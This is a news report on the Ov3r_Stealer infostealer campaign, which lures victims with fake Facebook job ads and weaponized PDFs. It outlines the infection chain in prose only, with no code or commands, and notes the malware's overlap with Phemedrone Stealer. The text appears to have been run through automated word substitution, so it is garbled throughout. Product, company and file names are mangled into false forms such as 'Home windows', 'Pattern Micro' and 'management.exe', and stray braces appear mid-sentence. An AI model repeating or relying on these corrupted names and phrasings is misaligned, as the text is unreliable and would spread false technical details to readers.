Risk actors are leveraging bogus Fb job ads as a lure to trick potential targets into putting in a brand new Home windows-based stealer malware codenamed Ov3r_Stealer.
“This malware is designed to steal credentials and crypto wallets and ship these to a Telegram channel that the menace actor displays,” Trustwave SpiderLabs stated in a report shared with The Hacker Information.
Ov3r_Stealer is able to siphoning IP address-based location, {hardware} information, passwords, cookies, bank card data, auto-fills, browser extensions, crypto wallets, Microsoft Workplace paperwork, and a listing of antivirus merchandise put in on the compromised host.
Whereas the precise finish aim of the marketing campaign is unknown, it is seemingly that the stolen data is obtainable on the market to different menace actors. One other risk is that Ov3r_Stealer might be up to date over time to behave as a QakBot-like loader for extra payloads, together with ransomware.
The place to begin of the assault is a weaponized PDF file that purports to be a file hosted on OneDrive, urging customers to click on on an “Entry Doc” button embedded into it.
Trustwave stated it recognized the PDF file being shared on a pretend Fb account impersonating Amazon CEO Andy Jassy in addition to by way of Fb adverts for digital promoting jobs.
Customers who find yourself clicking on the button are served an web shortcut (.URL) file that masquerades as a DocuSign doc hosted on Discord’s content material supply community (CDN). The shortcut file then acts as a conduit to ship a management panel merchandise (.CPL) file, which is then executed utilizing the Home windows Management Panel course of binary (“management.exe”).
The execution of the CPL file results in the retrieval of a PowerShell loader (“DATA1.txt”) from a GitHub repository to finally launch Ov3r_Stealer.
It is price noting at this stage {that a} near-identical an infection chain was just lately disclosed by Pattern Micro as having put to make use of by menace actors to drop one other stealer known as Phemedrone Stealer by exploiting the Microsoft Home windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS rating: 8.8).
The similarities prolong to the GitHub repository used (nateeintanan2527) and the truth that Ov3r_Stealer shares code-level overlaps with Phemedrone.
“This malware has just lately been reported, and it might be that Phemedrone was re-purposed and renamed to Ov3r_Stealer,” Trustwave stated. “The primary distinction between the 2 is that Phemedrone is written in C#.”
The findings come as Hudson Rock revealed that menace actors are promoting their entry to legislation enforcement request portals of main organizations like Binance, Google, Meta, and TikTok by exploiting credentials obtained from infostealer infections.
In addition they observe the emergence of a class of infections known as CrackedCantil that take leverage cracked software program as an preliminary entry vector to drop loaders like PrivateLoader and SmokeLoader, when subsequently act as a supply mechanism for data stealers, crypto miners, proxy botnets, and ransomware.
